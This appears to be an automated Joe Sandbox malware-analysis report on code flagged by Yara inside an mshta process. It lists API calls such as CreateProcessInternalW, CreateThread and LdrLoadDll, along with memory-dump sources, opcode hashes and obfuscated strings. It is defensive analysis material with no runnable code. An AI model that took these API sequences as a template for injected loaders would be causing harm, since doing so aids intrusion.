                • Instruction Fuzzy Hash: 76900231641400424980B16888459074005ABE1211755D121A09E8551D855989659665
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 1737da65a262a4af81d0d186a50162cbd94bc31a8271f91f3f242743704871ab
                • Instruction ID: 2465a6f6ed9d6a08a7ffa1c55b1b7b7b97077e9b81a6f1c713f00723f0e35ebb
                • Opcode Fuzzy Hash: 1737da65a262a4af81d0d186a50162cbd94bc31a8271f91f3f242743704871ab
                • Instruction Fuzzy Hash: 1090027138140442D940B1584415B070005C7E1301F55D015E10B4555D8619CD52A126
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 1564503d16ed68130f14405808f30f6192f97f458e1d95e17105fc9162cf3ca3
                • Instruction ID: 3f1d80d9fdb068d3f128ec8bb10ff5f8dbcba9bdc0d3615300a515cce7e59c37
                • Opcode Fuzzy Hash: 1564503d16ed68130f14405808f30f6192f97f458e1d95e17105fc9162cf3ca3
                • Instruction Fuzzy Hash: 3990023124140402D940B5985409647000587E0301F55E011A5074556EC6658991A131
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 1ff241c343d021a5b2f129b3b557e3a054ea433e41875f9ea37fdbf2958822d5
                • Instruction ID: 85ed84cfde80f4c3707550890d67a6c2ee2db7e836a6db29a5beb800f98f9ec0
                • Opcode Fuzzy Hash: 1ff241c343d021a5b2f129b3b557e3a054ea433e41875f9ea37fdbf2958822d5
                • Instruction Fuzzy Hash: 2F90023124140842D940B1584405B47000587E0301F55D016A0174655D8615C951B521
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 2f3665390fab791e03490a726f5c229e24f1c3d59ceeb9df3a7de543600ace7c
                • Instruction ID: 6c7922382ef829c07b978f04e65bb9a4dac64eccb9b8b123da70039d7559464a
                • Opcode Fuzzy Hash: 2f3665390fab791e03490a726f5c229e24f1c3d59ceeb9df3a7de543600ace7c
                • Instruction Fuzzy Hash: 1D90023124148802D950B158840574B000587D0301F59D411A4474659D86958991B121
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: d19a2011c19d49ad6fe25ac193781cbaca08666076bc8187111f76af64bf8a3c
                • Instruction ID: a15e24965101ea79be8737095251df9e3650af00e800068fd4b575ccde45b081
                • Opcode Fuzzy Hash: d19a2011c19d49ad6fe25ac193781cbaca08666076bc8187111f76af64bf8a3c
                • Instruction Fuzzy Hash: D390023124140413D951B1584505707000987D0241F95D412A0474559D96568A52E121
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 8620c91bcef9eb02d81ed6f966449aed37afb20d4e6fd91d0392f350b800ac87
                • Instruction ID: 1c54ae06b786fbb48f57a2a6180a7bc3aae7cfba0e26853aa2c71eca4124ba4d
                • Opcode Fuzzy Hash: 8620c91bcef9eb02d81ed6f966449aed37afb20d4e6fd91d0392f350b800ac87
                • Instruction Fuzzy Hash: 96900231282441525D85F1584405507400697E0241795D012A1464951C85269956D621
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 61644831bd35eab269a7d789ab2610a719815a69099fcf799a7fcc9ef82e4861
                • Instruction ID: 4f30b7410f0f13ed679a94f7db59ecf273301ed40cc623ca3c675d72de2d3703
                • Opcode Fuzzy Hash: 61644831bd35eab269a7d789ab2610a719815a69099fcf799a7fcc9ef82e4861
                • Instruction Fuzzy Hash: 1D90023134140003D980B15854196074005D7E1301F55E011E0464555CD91589569222
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 36411b6f1838abb922f53fb6d17ad6a84c4e939c0ec69897ac54ba3e7d098d25
                • Instruction ID: 7d253f75a6fa3b0fafcf89986db2a9c04ff145a19c1665dc880ad5fa1932aee6
                • Opcode Fuzzy Hash: 36411b6f1838abb922f53fb6d17ad6a84c4e939c0ec69897ac54ba3e7d098d25
                • Instruction Fuzzy Hash: 7F90023925340002D9C0B158540960B000587D1202F95E415A0065559CC91589699321
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 1d63ea60e8317a159da3df3ee9b4cc5108372d32be6ce3f9753361f0c7cb72cb
                • Instruction ID: 02f852bb1b0aeb263f0dc0a275807c73d83940df2018f0848553563fbc3b2556
                • Opcode Fuzzy Hash: 1d63ea60e8317a159da3df3ee9b4cc5108372d32be6ce3f9753361f0c7cb72cb
                • Instruction Fuzzy Hash: 0990023164550402D940B1584515707100587D0201F65D411A0474569D87958A51A5A2
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 0663c6e1d9b642c72048c729496707eb7f0e52bba35b05a951afcdc6aa5599f5
                • Instruction ID: 8cc5a77e72b435aa8c5c79c9d45ae512795528f3d1e28f832cfe595bd1ade561
                • Opcode Fuzzy Hash: 0663c6e1d9b642c72048c729496707eb7f0e52bba35b05a951afcdc6aa5599f5
                • Instruction Fuzzy Hash: A690023128545102D990B15C44056174005A7E0201F55D021A0864595D85558955A221

                Control-flow Graph

                control_flow_graph 348 5309a4-5309a8 349 5309f4-530a1e call 541740 348->349 350 5309aa-5309f3 call 54b060 call 54ba70 call 534140 call 521410 348->350 355 530a40-530a45 349->355 356 530a20-530a31 PostThreadMessageW 349->356 350->349 356->355 358 530a33-530a3d 356->358 358->355
                APIs
                • PostThreadMessageW.USER32(14_8-J-J8,00000111,00000000,00000000), ref: 00530A2D
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID: 14_8-J-J8$14_8-J-J8$8
                • API String ID: 1836367815-3311450054
                • Opcode ID: fc13ff0a71d076bfed5e476ffa27501aeaae3d0b5ba4c3a1d98c4645d0fd7757
                • Instruction ID: bf9ea9cb845dce4c2b9b83a19270b4b1c5bca273a95bfe9a371568c33f518598
                • Opcode Fuzzy Hash: fc13ff0a71d076bfed5e476ffa27501aeaae3d0b5ba4c3a1d98c4645d0fd7757
                • Instruction Fuzzy Hash: B311E671D40359BAEB219AA08C46FDF7F78AF81744F144058F9047F182D674AA069BA5

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 483 530975-530977 484 5309b7-530a1e call 54b060 call 54ba70 call 534140 call 521410 call 541740 483->484 485 530979 483->485 499 530a40-530a45 484->499 500 530a20-530a31 PostThreadMessageW 484->500 486 53097b-530999 485->486 487 53099a-5309a1 485->487 486->487 500->499 501 530a33-530a3d 500->501 501->499
                APIs
                • PostThreadMessageW.USER32(14_8-J-J8,00000111,00000000,00000000), ref: 00530A2D
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID: 14_8-J-J8$14_8-J-J8
                • API String ID: 1836367815-2300785184
                • Opcode ID: 823298dc12a135ce9327697aae650c61c672005b061da40508a0a1569691f0a1
                • Instruction ID: 6d54d1cea6312eabe19d95cff46851f399b5d957b972906a32b9fd58daf78276
                • Opcode Fuzzy Hash: 823298dc12a135ce9327697aae650c61c672005b061da40508a0a1569691f0a1
                • Instruction Fuzzy Hash: 07117F31D40348B6EB10DAA59C45FDFBF7CAF85710F004055FA08BB282D774A6058B95

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 502 5309b0-530a1e call 54b060 call 54ba70 call 534140 call 521410 call 541740 515 530a40-530a45 502->515 516 530a20-530a31 PostThreadMessageW 502->516 516->515 517 530a33-530a3d 516->517 517->515
                APIs
                • PostThreadMessageW.USER32(14_8-J-J8,00000111,00000000,00000000), ref: 00530A2D
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID: 14_8-J-J8$14_8-J-J8
                • API String ID: 1836367815-2300785184
                • Opcode ID: 6226ec75c0c6a454b765ae99fe59d60a10c462eb1897dc4a18fd4a6b332a5b5d
                • Instruction ID: 81bdff5036c64b674854be39301271ed45bcb8068cf824c50bbbe364c8e1d793
                • Opcode Fuzzy Hash: 6226ec75c0c6a454b765ae99fe59d60a10c462eb1897dc4a18fd4a6b332a5b5d
                • Instruction Fuzzy Hash: AD012631D4031876EB21A6A18C06FDF7F7CAF80B40F008054FA047B2C1D6B4AA069BE5
                APIs
                • Sleep.KERNELBASE(000007D0), ref: 005436CB
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: Sleep
                • String ID: net.dll$wininet.dll
                • API String ID: 3472027048-1269752229
                • Opcode ID: 8907e4f39e166c411ee01f930a4b83284eb160a036cd07420165da6f02819127
                • Instruction ID: db9a4f0390e9a77a35f676d44f686df400519c15e135022e0e75cdc890051156
                • Opcode Fuzzy Hash: 8907e4f39e166c411ee01f930a4b83284eb160a036cd07420165da6f02819127
                • Instruction Fuzzy Hash: AA318CB1A00705BBD714DFA4C885FEBBBB8FB84714F10451DB559AB281D774AB40CBA4
                APIs
                • CoInitialize.OLE32(00000000), ref: 0053F0C7
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: Initialize
                • String ID: @J7<
                • API String ID: 2538663250-2016760708
                • Opcode ID: 6f35583276a351e733d985038f74af85754a76c14e485a0c87da6e42a0aabcca
                • Instruction ID: bf1f3823f7a17a45ee1f3a6d4fd7d67898451337dad8932e6117328a4b4b7ca1
                • Opcode Fuzzy Hash: 6f35583276a351e733d985038f74af85754a76c14e485a0c87da6e42a0aabcca
                • Instruction Fuzzy Hash: 4531FDB6A1060AAFDB00DFD8D8809EFB7B9BF88304F108559E515AB214D775EE45CBA0
                APIs
                • CoInitialize.OLE32(00000000), ref: 0053F0C7
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: Initialize
                • String ID: @J7<
                • API String ID: 2538663250-2016760708
                • Opcode ID: b5e8863e55f8d821b0291e69df75c0f2d78ea6fbc229a9a11b9c27def748576b
                • Instruction ID: 1482df195188e107a39e9d50045719655b7a85f01bf647a661165643e0fd8c36
                • Opcode Fuzzy Hash: b5e8863e55f8d821b0291e69df75c0f2d78ea6fbc229a9a11b9c27def748576b
                • Instruction Fuzzy Hash: 92310CB5A0060AAFDB00DFD8DC809EFB7B9BF88304F108559E915AB214D775EE45CBA0
                APIs
                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00537FBC
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 06b6a90070744e342cdab425dc7603143a4a8b7d938ed9668fcbf1c7052f662e
                • Instruction ID: 511fa0b600f316333c6e4462ef58695a013cea04d3ac4375c94042fe41d4f151
                • Opcode Fuzzy Hash: 06b6a90070744e342cdab425dc7603143a4a8b7d938ed9668fcbf1c7052f662e
                • Instruction Fuzzy Hash: 5521EE63519353ABC7154938D88B2D1BFC4FB06638B745798D0214F5C1DB22D88BD7D1
                APIs
                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 005341B2
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: Load
                • String ID:
                • API String ID: 2234796835-0
                • Opcode ID: db8ee8fa6869118bf05ef2a336e82e6538ab0c4bc372bbb6e22ac2f78f82d93c
                • Instruction ID: 4501098599e76a9dcffd1ffb6505613cc5bad94c9e8fda94f6ef084b374f0f54
                • Opcode Fuzzy Hash: db8ee8fa6869118bf05ef2a336e82e6538ab0c4bc372bbb6e22ac2f78f82d93c
                • Instruction Fuzzy Hash: 4C0112B6E4020EA7DF10DAE4DC46FDDBB78AB94708F004195E90897241F671EB54CB91
                APIs
                • CreateProcessInternalW.KERNELBASE(?,?,?,?,00537F4E,00000010,?,?,?,00000044,?,00000010,00537F4E,?,?,?), ref: 00549353
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: CreateInternalProcess
                • String ID:
                • API String ID: 2186235152-0
                • Opcode ID: 38dcccab76c19756cfad6db72e33ff0aa66d3d5edec3420a69c5b5e22c34f49f
                • Instruction ID: 7b0aa7a5d6e393c218ae23581290a88f7f71c3ed5d0fad19373720b36df28150
                • Opcode Fuzzy Hash: 38dcccab76c19756cfad6db72e33ff0aa66d3d5edec3420a69c5b5e22c34f49f
                • Instruction Fuzzy Hash: EC01D2B2204109BBDB44DF89DC81EEB77ADAF8C714F418208BA09E7241D631FC51CBA4
                APIs
                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00529BE5
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: CreateThread
                • String ID:
                • API String ID: 2422867632-0
                • Opcode ID: e32e52a3b991dfb785de9cc77c824cc80be7fe5a3d425403359f45cbf05bd7e6
                • Instruction ID: 87c027a508710c0d70cf6bb8cd4abb1311282a9d78b3b11aa23c53e71fae964b
                • Opcode Fuzzy Hash: e32e52a3b991dfb785de9cc77c824cc80be7fe5a3d425403359f45cbf05bd7e6
                • Instruction Fuzzy Hash: F0F065333846143AE62071A9AC06FD77A8CDFC1761F140025F64CEB2C1D896B54156E9
                APIs
                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00529BE5
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: CreateThread
                • String ID:
                • API String ID: 2422867632-0
                • Opcode ID: 06eb7cbb993b03b6c2ae8bd19b188f05332a59b644e87a95483075884f042889
                • Instruction ID: 6c5675965f029023f3d127038e12a4424745a69b5871875a3c5ff3afc875d7da
                • Opcode Fuzzy Hash: 06eb7cbb993b03b6c2ae8bd19b188f05332a59b644e87a95483075884f042889
                • Instruction Fuzzy Hash: 91F02B32280A103AE63022A89C47FDB7A5CDFC1750F100014F64DAB2C1C9A2B80286E4
                APIs
                • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 00547E73
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: Path$NameName_
                • String ID:
                • API String ID: 3514427675-0
                • Opcode ID: 306ccb214922e5c0e23f2a3a073c80bb8823ec9cc9e66877662352cea8a0ca09
                • Instruction ID: f1c52bee06b1f635324c4c3639c5597d570ed03a42a72f64f94d561b38dceb75
                • Opcode Fuzzy Hash: 306ccb214922e5c0e23f2a3a073c80bb8823ec9cc9e66877662352cea8a0ca09
                • Instruction Fuzzy Hash: 64F039B56506097BDA10EE59DC41EEB77ACEFC9754F008419FA08A7241C670B9118BF4
                APIs
                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,FFFEBCBD,00000007,00000000,00000004,00000000,005339BE,000000F4), ref: 0054929F
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 0e893eb5d20eb2c49f3964149c8d38e4493d492713042be715878a4d1694b429
                • Instruction ID: 423de08663c729e5e3f4d480d330e3e99be81fd60ed588e673da4880fe488d73
                • Opcode Fuzzy Hash: 0e893eb5d20eb2c49f3964149c8d38e4493d492713042be715878a4d1694b429
                • Instruction Fuzzy Hash: DCE06D716002497BEA10EE58DC45EDB37ACEFC9720F404418F908A7242CA70B81187B8
                APIs
                • RtlAllocateHeap.NTDLL(00531649,?,0054570B,00531649,005451DF,0054570B,?,00531649,005451DF,00001000,?,?,00000000), ref: 0054924F
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID:
                • API String ID: 1279760036-0
                • Opcode ID: c8a19b05e8f33450ad0a94f44c71f626650ed0b1ae2f9d5f6ae6dc2fc0e2b896
                • Instruction ID: f594eb39764b887477799e558dd36ce4eaf033f0aee958c5521201c2ed98f2bd
                • Opcode Fuzzy Hash: c8a19b05e8f33450ad0a94f44c71f626650ed0b1ae2f9d5f6ae6dc2fc0e2b896
                • Instruction Fuzzy Hash: BBE06D716402057BD610EE58DC49F9B77ACEFC9710F008019F908A7242C630B9148BB8
                APIs
                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00537FBC
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: e3d59eb00638ab8072c7776ecc22df313c9a814dc3f1845db0b85d205fab0b49
                • Instruction ID: 1410bfe042a0babf840458868a85eece30f5bc1a42efc405bc58d25ae82dac44
                • Opcode Fuzzy Hash: e3d59eb00638ab8072c7776ecc22df313c9a814dc3f1845db0b85d205fab0b49
                • Instruction Fuzzy Hash: 51E080716543092BFB346578DC45F65375CA74C728F144570B95CDB5C1D578F9414150
                APIs
                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00537FBC
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 61f79a53555538bc42af5be30e6f9d6f665386fe0cff89438d61bf0f7cd28812
                • Instruction ID: 6010999ef5f74ca0bff329acbaa312ba8b3ece9bd183d367b6cc591f88d92bc4
                • Opcode Fuzzy Hash: 61f79a53555538bc42af5be30e6f9d6f665386fe0cff89438d61bf0f7cd28812
                • Instruction Fuzzy Hash: EDE02BF195420D36FB3025344C46BB11B04B79DB28F280B20B8289E5C1F138ED024110
                APIs
                • SetErrorMode.KERNELBASE(00008003,?,?,00531930,00547B1F,005451DF,00531900), ref: 00537DB3
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: ErrorMode
                • String ID:
                • API String ID: 2340568224-0
                • Opcode ID: 77c9b0867f73a3f1d48334fb6d5e1bcca487c79abd60476a3e421f40e1f9c931
                • Instruction ID: 657d6ad6ebbba8965d98fd0fd8fa35c6680d94825cde8004858ff64c91114cd0
                • Opcode Fuzzy Hash: 77c9b0867f73a3f1d48334fb6d5e1bcca487c79abd60476a3e421f40e1f9c931
                • Instruction Fuzzy Hash: 2BD02E72B803043FFA50B2F0CC07F92368CAB50351F004020BA8CEB2C2E828F20045BA
                APIs
                • SetErrorMode.KERNELBASE(00008003,?,?,00531930,00547B1F,005451DF,00531900), ref: 00537DB3
                Memory Dump Source
                • Source File: 00000006.00000002.4598711950.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Offset: 00520000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_520000_mshta.jbxd
                Yara matches
                Similarity
                • API ID: ErrorMode
                • String ID:
                • API String ID: 2340568224-0
                • Opcode ID: c4960a3660b3bc3397b4005a4d779cc0765185ab9e4881f8507527ff97859c28
                • Instruction ID: f5f7cb751238d2fa3e2d203861a6e47dc65584099ad63b0ab68893a0e503d96e
                • Opcode Fuzzy Hash: c4960a3660b3bc3397b4005a4d779cc0765185ab9e4881f8507527ff97859c28
                • Instruction Fuzzy Hash: 31D022D298820611FB81A1B02C0B6A55A482F60216F08C968F40CC4083FA08C0811022
                APIs
                Memory Dump Source
                • Source File: 00000006.00000002.4606266517.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                • Associated: 00000006.00000002.4606266517.0000000002F89000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002F8D000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000006.00000002.4606266517.0000000002FFE000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_2e60000_mshta.jbxd
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 110fa4d912eebc4974d5a32e84d8df203c7a124c258c84392a5a043190dc9033
                • Instruction ID: dd2299ddc4456550d0e532b0349a3d6c27dde8ecb009721312ae40368147131a
                • Opcode Fuzzy Hash: 110fa4d912eebc4974d5a32e84d8df203c7a124c258c84392a5a043190dc9033
                • Instruction Fuzzy Hash: 74B092729829C5CAEE52E7604A09B1B7A00ABD0705F2AD462E3070686F4738C5D2F2B6
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.4607115675.00000000031B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_31b0000_mshta.jbxd
                Similarity
                • API ID:
                • String ID: `{r$ ;}g$!:ir$7}ff$: =?$;97r$;<&=$>>3}$adrz$ae|a$bcb$cggr$fba|$gae|$g|br$rrc$|b|`
                • API String ID: 0-643199265
